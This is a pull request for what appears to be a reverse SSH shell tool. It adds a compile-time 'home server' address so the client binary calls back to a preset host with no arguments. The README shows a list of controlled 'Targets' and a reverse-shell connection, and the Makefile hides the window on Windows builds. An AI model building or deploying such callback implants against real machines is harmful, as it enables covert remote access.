### PR TITLE
✨ Add default server functionality

### DIFF
--- a/Makefile
+++ b/Makefile
@@ -1,18 +1,23 @@
 ADDR=localhost:2200
-LDFLAGS = -s -w
 
 ifeq "$(GOOS)" "windows"
 	LDFLAGS += -H=windowsgui
 endif
 
-debug: .generate_keys
-	go build  -o bin ./...
+ifdef RSSH_HOMESERVER
+	LDFLAGS += -X main.defaultClientDestination=$(RSSH_HOMESERVER)
+endif
 
-release: .generate_keys
+LDFLAGS_RELEASE = $(LDFLAGS) -s -w
+
+debug: .generate_keys
 	go build -ldflags="$(LDFLAGS)" -o bin ./...
 
+release: .generate_keys
+	go build -ldflags="$(LDFLAGS_RELEASE)" -o bin ./...
+
 client: .generate_keys
-	go build -ldflags="$(LDFLAGS)" -o bin ./cmd/client
+	go build -ldflags="$(LDFLAGS_RELEASE)" -o bin ./cmd/client
 
 run:
 	./bin/client --reconnect $(ADDR)

--- a/README.md
+++ b/README.md
@@ -120,12 +120,12 @@ scp -P 3232 test catcher.com:0be2782caae4bedff780e14526f7618ab61e24fa:/etc/passw
 On connection you will be presented by a list of controllable clients, e.g:
 ```
 catcher$ ls
-                    Targets
----------------------------------------------------------------------
-| ID                                       | Hostname | IP Address  |
----------------------------------------------------------------------
-| 0f6ffecb15d75574e5e955e014e0546f6e2851ac | wombo  | [::1]:45150   |
----------------------------------------------------------------------
+                                Targets
++------------------------------------------+------------+-------------+
+| ID                                       | Hostname   | IP Address  |
++------------------------------------------+------------+-------------+
+| 0f6ffecb15d75574e5e955e014e0546f6e2851ac | root@wombo | [::1]:45150 |
++------------------------------------------+------------+-------------+
 ```
 
 Use `help` or press `tab` to view commands.  
@@ -137,3 +137,16 @@ So you you wanted to connect to the client given in the example:
 Will auto complete the entry for you and on enter will connect you to your reverse shell. 
 
 
+### Default Server
+
+At build time, you can specify a default server for the client binary to connect to:
+
+```sh
+$ RSSH_HOMESERVER=localhost:1234 make
+
+# Will connect to localhost:1234, even though no destination is specified
+$ bin/client
+
+# Behaviour is otherwise normal; will connect to example.com:1234
+$ bin/client example.com:1234
+```

--- a/cmd/client/main.go
+++ b/cmd/client/main.go
@@ -20,6 +20,8 @@ func printHelp() {
 	fmt.Println("\t\t--proxy\tSets the HTTP_PROXY enviroment variable so the net library will use it")
 }
 
+var defaultClientDestination string
+
 func main() {
 
 	flag.Bool("foreground", false, "Dont fork to background on start")
@@ -42,15 +44,20 @@ func main() {
 		}
 	})
 
-	if len(flag.Args()) != 1 {
-		fmt.Println("Missing destination")
-		printHelp()
-		return
+	destination := flag.Arg(0)
+
+	if len(destination) == 0 {
+		if len(defaultClientDestination) > 0 {
+			destination = defaultClientDestination
+		} else {
+			fmt.Println("Missing destination (no default present)")
+			printHelp()
+			return
+		}
 	}
 
 	if fg {
-
-		client.Run(flag.Args()[0], *fingerprint, *proxyAddress, rc)
+		client.Run(destination, *fingerprint, *proxyAddress, rc)
 		return
 	}
 


### PR DESCRIPTION
Allows you to specify a default server at compile time for the client to connect back to.

```sh
$ RSSH_HOMESERVER=localhost:1234 make

# Will connect to localhost:1234, even though no destination is specified
$ bin/client

# Behavior is otherwise normal; will connect to example.com:1234
$ bin/client example.com:1234
```